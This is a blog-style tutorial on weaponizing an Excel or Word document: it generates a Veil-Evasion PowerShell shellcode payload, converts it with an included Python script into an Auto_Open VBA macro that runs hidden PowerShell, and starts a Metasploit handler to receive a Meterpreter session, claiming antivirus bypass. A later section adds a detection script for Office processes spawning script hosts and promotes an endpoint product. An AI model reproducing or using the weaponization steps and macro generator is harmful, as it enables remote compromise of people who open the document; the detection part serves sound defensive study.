Weaponizing MS Office Documents With Veil PowerShell Payloads, Bypassing Antiviruses, and The Importance of Endpoint Security

The Veil-Evasion tool that ships with Kali Linux helps you create payloads capable of bypassing antivirus products. In this tutorial we generate a PowerShell payload with Veil, embed it in an Excel document as a macro, and test it in an environment protected by the Windows Firewall, Windows Defender and a third-party antivirus with its dynamic analysis options enabled. Let's dive in:

First run the following command to start Veil:

python /usr/share/veil-evasion/Veil-Evasion.py

Veil Evasion

On the next screen type "list" to see the available payloads:

Veil Payload List

Here type "25" to select the "powershell/shellcode_inject/virtual" option (the number depends on your Veil version, so read it off the list rather than typing it blindly). Then type "generate" to prepare the payload:

Veil Generate Payload

Generating the payload is straightforward. Accept the default options and enter the IP address and port of your attacking machine; these become the LHOST and LPORT the handler will listen on:

Veil Generate Shellcode

Once generation finishes, Veil writes two files of interest: the payload file itself and a Metasploit handler resource file:

Veil Generate Shellcode

Now open the generated payload file in your favourite editor: /var/lib/veil-evasion/output/source/payload.bat

Then copy the PowerShell command section as shown below (click the pictures to see them in full size):

Payload

Save it as input.bat, as below:

Payload

To run this PowerShell command from an Office document, we need to convert it into VBA (Visual Basic for Applications, the macro language of MS Office documents). This is a conversion step, not a disguise: the macro still launches powershell.exe with the same command line, which is exactly what a behaviour-based endpoint product will look for.

I used the safe_macro.py script by khi@sh. You can reach the code here. (I had to comment out lines 54 and 55 to run the code in my case.)

Safe Macro

Then you can copy and paste the generated code into a macro in your malicious Office document. For it to fire without user interaction beyond enabling macros, the code has to sit in an auto-run procedure such as Auto_Open (Excel) or AutoOpen (Word), and the file must be saved in a macro-enabled format (.xlsm or .docm). That's it, the document is ready.
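The conversion step above, as an added example rather than the safe_macro.py script the post uses: it takes a PowerShell one-liner like the one copied out of payload.bat and emits a VBA macro that rebuilds the command at run time and hands it to Shell(). The splitting matters because VBA caps a physical line at 1023 characters and a statement at 24 continuation lines, so a multi-kilobyte command cannot be pasted as one literal. The sample command is constructed here from a benign script; Veil's real stager is not reproduced, and the -EncodedCommand wrapper is only a stand-in for whatever payload.bat contains.

```python
"""
Turn the PowerShell one-liner copied out of payload.bat into a VBA macro.

Added example, not the safe_macro.py script used in the post: it does the
same job in the open so the mechanics are visible.
"""
from __future__ import annotations

import base64
import re

# Characters per literal; kept far below VBA's 1023-character line limit.
CHUNK = 80

# Sub names that Office runs on open when they sit in a standard module.
AUTO_RUN = {"excel": "Auto_Open", "word": "AutoOpen"}

# Matches the concatenation lines to_vba() emits, for extract_command().
PIECE_RX = re.compile(r'^\s*c = c & "(.*)"$')


def vba_escape(text: str) -> str:
    """Inside a VBA string literal a double quote is written twice."""
    return text.replace('"', '""')


def vba_unescape(text: str) -> str:
    return text.replace('""', '"')


def chunk(command: str, size: int = CHUNK) -> list[str]:
    """Cut the command into pieces that concatenate back to the original."""
    return [command[i:i + size] for i in range(0, len(command), size)]


def to_vba(command: str, app: str = "excel") -> str:
    """Emit a macro whose auto-run Sub reassembles the command and runs it.

    Shell() hands the string to the Windows command processor, so the same
    powershell.exe invocation that works from payload.bat works here.
    """
    lines = [f"Sub {AUTO_RUN[app]}()", "    Dim c As String", '    c = ""']
    for piece in chunk(command):
        lines.append(f'    c = c & "{vba_escape(piece)}"')
    lines.append("    Shell c, vbHide")
    lines.append("End Sub")
    return "\n".join(lines)


def extract_command(vba: str) -> str:
    """Reverse the conversion: recover the command a generated macro will run."""
    pieces = [m.group(1) for line in vba.splitlines() if (m := PIECE_RX.match(line))]
    return vba_unescape("".join(pieces))


def encoded_command(script: str) -> str:
    """Constructed stand-in for the Veil one-liner, which is not reproduced here.

    It uses the -EncodedCommand form PowerShell expects: base64 of the
    script encoded as UTF-16LE.
    """
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {b64}"


if __name__ == "__main__":
    cmd = encoded_command("Write-Output 'macro ran'")
    macro = to_vba(cmd, app="excel")
    print(macro)
    assert extract_command(macro) == cmd
```

Paste the printed Sub into a standard module (Module1) of a macro-enabled workbook or document; extract_command() lets you check what a macro will actually execute before it leaves your lab.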

Now start the listener with the handler resource file Veil generated and wait for the victim to open the document:

msfconsole -r /var/lib/veil-evasion/output/handlers/payload_handler.rc

Generate Handler

The Meterpreter session opens in the background. To interact with it type "sessions -i 1" (use "sessions -l" first if you are not sure of the session ID).

You’re in.

As you can see, a very straightforward technique was enough to get past the antivirus product and the other mitigations in this test environment. There are countless attack and exploitation vectors, and traditional signature-based defenses cannot be expected to handle all of them; what they miss here is not the payload bytes but the behaviour, an Office application launching a hidden PowerShell process.
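The behavioural check that catches this technique regardless of how the payload is encoded, as an added example that is not part of the original post and is not Trapmine's detection logic: a parent/child rule over process-creation telemetry. It flags an Office application spawning a script host, scores the dropper-style flags on the command line, and decodes -EncodedCommand so an analyst sees the script rather than base64. The events below are constructed in the shape of Sysmon Event ID 1 fields; the encoded payload is a benign one-liner built in the block, not the Veil stager.

```python
"""
Detect Office applications spawning script hosts with dropper-style flags.

Added example: a SOC-style rule over process-creation events, not any
vendor's detection logic.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts any unambiguous prefix of a switch, so match prefixes.
# Interactive users rarely type these; macro droppers almost always do.
SUSPICIOUS_FLAGS = {
    "hidden window":   re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden"),
    "policy bypass":   re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+bypass"),
    "no profile":      re.compile(r"(?i)(?:^|\s)-nop[a-z]*\b"),
    "non-interactive": re.compile(r"(?i)(?:^|\s)-noni[a-z]*\b"),
    "encoded command": re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+[A-Za-z0-9+/=]{16,}"),
}
ENC_RX = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text)."""
    for m in ENC_RX.finditer(cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    parent: str
    image: str
    reasons: list[str]
    decoded: str | None = None


def evaluate(event: dict) -> Alert | None:
    """Return an Alert when an Office process launches a script host."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    reasons = [f"{parent} spawned {image}"]
    reasons += [name for name, rx in SUSPICIOUS_FLAGS.items() if rx.search(cmdline)]
    return Alert(parent, image, reasons, decode_encoded_command(cmdline))


def scan(events: list[dict]) -> list[Alert]:
    return [a for a in map(evaluate, events) if a]


# Constructed Sysmon-style events; the encoded payload is a benign one-liner.
SAMPLE_ENC = base64.b64encode("Write-Output 'macro ran'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {SAMPLE_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: not an Office parent
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",  # benign: print helper, not a script host
     "CommandLine": "splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",  # cmd.exe as an intermediate hop
     "CommandLine": 'cmd.exe /c powershell -w hidden -c "Start-Process calc"'},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The parent/child pair alone is the strong signal; the flag scoring only orders the queue, and the cmd.exe hop in the last event shows why the child set has to include intermediate shells and not just powershell.exe.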

Here I want to introduce you to a next-generation endpoint security tool: Trapmine. Trapmine hunts for exploit-like behaviour and flags malicious activity. Below you can see how it catches the same macro exploit we built here, this time delivered in a Word document:

Trapmine Warning

You can learn about Trapmine here.